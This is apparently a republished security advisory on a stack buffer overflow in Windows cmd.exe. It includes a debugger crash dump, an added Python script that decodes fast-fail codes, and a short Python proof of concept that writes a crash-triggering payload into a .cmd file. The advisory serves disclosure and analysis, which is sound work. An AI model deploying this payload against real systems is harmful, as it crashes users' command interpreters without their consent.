Microsoft Windows cmd.exe Stack Buffer Overflow

Posted Sep 16, 2021
Authored by hyp3rlinx | Site hyp3rlinx.altervista.org

Microsoft Windows cmd.exe suffers from a stack buffer overflow vulnerability.

tags | exploit, overflow
systems | windows
SHA-256 | c0c6e1e6e941a667fff8d2e3a59cb00e4f436bf4e75ed0004cb71c6091fe1a0f

[+] Credits: John Page (aka hyp3rlinx, malvuln)    
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CMD.EXE-STACK-BUFFER-OVERFLOW.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com


[Product]
cmd.exe is the default command-line interpreter for the OS/2, eComStation, ArcaOS, Microsoft Windows (Windows NT family and Windows CE family), and ReactOS operating systems.


[Vulnerability Type]
Stack Buffer Overflow


[CVE Reference]
N/A


[Security Issue]
A specially crafted payload triggers a stack buffer overflow in the Windows NT "cmd.exe" command-line interpreter. Triggering it requires running an already dangerous file type such as .cmd or .bat. However, cmd.exe also accepts arguments through the /c and /k flags, which execute the command specified by a string, and that path triggers the buffer overflow condition as well.

E.g. cmd.exe /c <PAYLOAD>.

[Memory Dump]
(660.12d4): Stack buffer overflow - code c0000409 (first/second chance not available)
ntdll!ZwWaitForMultipleObjects+0x14:
00007ffb`00a809d4 c3 ret


0:000> .ecxr
rax=0000000000000022 rbx=000002e34d796890 rcx=00007ff7c0e492c0
rdx=00007ff7c0e64534 rsi=000000000000200e rdi=000000000000200c
rip=00007ff7c0e214f8 rsp=000000f6a82ff0a0 rbp=000000f6a82ff1d0
r8=000000000000200c r9=00007ff7c0e60520 r10=0000000000000000
r11=0000000000000000 r12=000002e34d77a810 r13=0000000000000002
r14=000002e34d796890 r15=000000000000200d
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
cmd!StripQuotes+0xa8:
00007ff7`c0e214f8 cc int 3

0:000> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

Failed calling InternetOpenUrl, GLE=12029

FAULTING_IP:
cmd!StripQuotes+a8
00007ff7`c0e214f8 cc int 3


EXCEPTION_RECORD: ffffffffffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00007ff7c0e214f8 (cmd!StripQuotes+0x00000000000000a8)
ExceptionCode: c0000409 (Stack buffer overflow)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter[0]: 0000000000000008

PROCESS_NAME: cmd.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1: 0000000000000008

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG: 0

APPLICATION_VERIFIER_FLAGS: 0

FAULTING_THREAD: 00000000000012d4

BUGCHECK_STR: APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE

PRIMARY_PROBLEM_CLASS: STACK_BUFFER_OVERRUN_EXPLOITABLE

DEFAULT_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE

LAST_CONTROL_TRANSFER: from 00007ffafcfca9c6 to 00007ffb00a809d4

STACK_TEXT:
000000f6`a82fea38 00007ffa`fcfca9c6 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!ZwWaitForMultipleObjects+0x14
000000f6`a82fea40 00007ffa`fcfca8ae : 00000000`00000098 00000000`00000096 00000000`d000022d 00000000`d000022d : KERNELBASE!WaitForMultipleObjectsEx+0x106
000000f6`a82fed40 00007ffa`fe1d190e : 00000000`00000000 000000f6`a82ff1d0 00007ff7`c0e3e000 00007ffb`009f5a81 : KERNELBASE!WaitForMultipleObjects+0xe
000000f6`a82fed80 00007ffa`fe1d150f : 00000000`00000000 00000000`00000000 00000000`00000003 00000000`00000001 : kernel32!WerpReportFaultInternal+0x3ce
000000f6`a82feea0 00007ffa`fd05976b : 00000000`00000000 000000f6`a82ff1d0 00000000`00000004 00000000`00000000 : kernel32!WerpReportFault+0x73
000000f6`a82feee0 00007ff7`c0e26b6a : 00007ff7`c0e3e000 00007ff7`c0e3e000 00000000`0000200e 00000000`0000200c : KERNELBASE!UnhandledExceptionFilter+0x35b
000000f6`a82feff0 00007ff7`c0e26df6 : 000002e3`00000000 00007ff7`c0e10000 000002e3`4d796890 00007ff7`c0e6602c : cmd!_raise_securityfailure+0x1a
000000f6`a82ff020 00007ff7`c0e214f8 : 000002e3`4d77a810 00000000`00000000 00000000`00000002 00000000`0000200e : cmd!_report_rangecheckfailure+0xf2
000000f6`a82ff0a0 00007ff7`c0e2096f : 00000000`0000200c 000000f6`a82ff1d0 000000f6`a82ff1d0 00000000`0000200e : cmd!StripQuotes+0xa8
000000f6`a82ff0d0 00007ff7`c0e239a9 : 000002e3`4d76ff90 000002e3`4d76ff90 00000000`00000000 000002e3`4d76ff90 : cmd!SearchForExecutable+0x443
000000f6`a82ff390 00007ff7`c0e1fb9e : 00000000`00000000 000002e3`4d76ff90 ffffffff`ffffffff 000002e3`4d990000 : cmd!ECWork+0x69
000000f6`a82ff600 00007ff7`c0e1ff35 : 00007ff7`c0e4fbb0 000002e3`4d76ff90 00000000`00000000 00000000`00000001 : cmd!FindFixAndRun+0x3de
000000f6`a82ffaa0 00007ff7`c0e2277e : 00000000`00000002 000000f6`a82ffbb0 00000000`00000000 00000000`00000002 : cmd!Dispatch+0xa5
000000f6`a82ffb30 00007ff7`c0e26a89 : 00000000`00000001 00000000`00000000 00007ff7`c0e3fd78 00000000`00000000 : cmd!main+0x1fa
000000f6`a82ffbd0 00007ffa`fe1e1fe4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : cmd!wil::details_abi::ProcessLocalStorage<wil::details_abi::ProcessLocalData>::~ProcessLocalStorage<wil::details_abi::ProcessLocalData>+0x289
000000f6`a82ffc10 00007ffb`00a4efc1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14
000000f6`a82ffc40 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21

FOLLOWUP_IP:
cmd!StripQuotes+a8
00007ff7`c0e214f8 cc int 3

SYMBOL_STACK_INDEX: 8

SYMBOL_NAME: cmd!StripQuotes+a8

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: cmd

IMAGE_NAME: cmd.exe

DEBUG_FLR_IMAGE_TIMESTAMP: 0

STACK_COMMAND: ~0s ; kb

FAILURE_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE_c0000409_cmd.exe!StripQuotes

BUCKET_ID: X64_APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE_MISSING_GSFRAME_cmd!StripQuotes+a8
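
Triage aid for the dump above, added here as an example and not part of the original advisory: it decodes the fast-fail subcode carried in Parameter[0] of a c0000409 exception (constants from winnt.h) and skips the CRT reporting helpers to find the frame that raised the failure and its caller. The function name `triage` and the trimmed sample are this example's own.

```python
import re

# __fastfail subcodes from winnt.h (subset).
FAST_FAIL = {
    0: "FAST_FAIL_LEGACY_GS_VIOLATION",
    2: "FAST_FAIL_STACK_COOKIE_CHECK_FAILURE",
    3: "FAST_FAIL_CORRUPT_LIST_ENTRY",
    5: "FAST_FAIL_INVALID_ARG",
    7: "FAST_FAIL_FATAL_APP_EXIT",
    8: "FAST_FAIL_RANGE_CHECK_FAILURE",
    10: "FAST_FAIL_GUARD_ICALL_CHECK_FAILURE",
}
# CRT helpers that only report the failure; the next frame down is the real site.
REPORTERS = ("raise_securityfailure", "report_rangecheckfailure",
             "report_gsfailure", "report_securefailure")

# Excerpt of the dump above; address and argument columns replaced by "...".
SAMPLE = """\
ExceptionCode: c0000409 (Stack buffer overflow)
Parameter[0]: 0000000000000008
STACK_TEXT:
... : ntdll!ZwWaitForMultipleObjects+0x14
... : KERNELBASE!UnhandledExceptionFilter+0x35b
... : cmd!_raise_securityfailure+0x1a
... : cmd!_report_rangecheckfailure+0xf2
... : cmd!StripQuotes+0xa8
... : cmd!SearchForExecutable+0x443
... : cmd!ECWork+0x69
"""

def triage(text, module="cmd"):
    """Return exception code, decoded fast-fail subcode, raising frame and caller."""
    code = int(re.search(r"ExceptionCode:\s*([0-9a-fA-F]+)", text).group(1), 16)
    m = re.search(r"Parameter\[0\]:\s*([0-9a-fA-F]+)", text)
    sub = int(m.group(1), 16) if m else None
    # Only the STACK_TEXT block holds frames; the symbol is the last column.
    block = text.split("STACK_TEXT:", 1)[1].split("\n\n", 1)[0]
    frames = [ln.split()[-1] for ln in block.splitlines() if "!" in ln]
    own = [f for f in frames if f.startswith(module + "!")
           and not any(r in f for r in REPORTERS)]
    return {
        "code": code,
        "fast_fail": FAST_FAIL.get(sub, "unknown") if code == 0xC0000409 else None,
        "site": own[0] if own else None,
        "caller": own[1] if len(own) > 1 else None,
    }
```

For this dump the subcode 8 decodes to FAST_FAIL_RANGE_CHECK_FAILURE, which agrees with the cmd!_report_rangecheckfailure frame in the stack text.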


[Exploit/POC]
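# Four-character unit (chr(235), a backslash, "CC") repeated 3000 times
PAYLOAD = chr(235) + "\\CC"
PAYLOAD = PAYLOAD * 3000

# Write the payload to a batch file
with open("hate.cmd", "w") as f:
    f.write(PAYLOAD)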


[Network Access]
Local


[Video PoC URL]
https://www.youtube.com/watch?v=wYYgjV-PzD8


[Severity]
Low


[Disclosure Timeline]
Vendor Notification: Requires running dangerous file types already.

September 15, 2021 : Public Disclosure


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx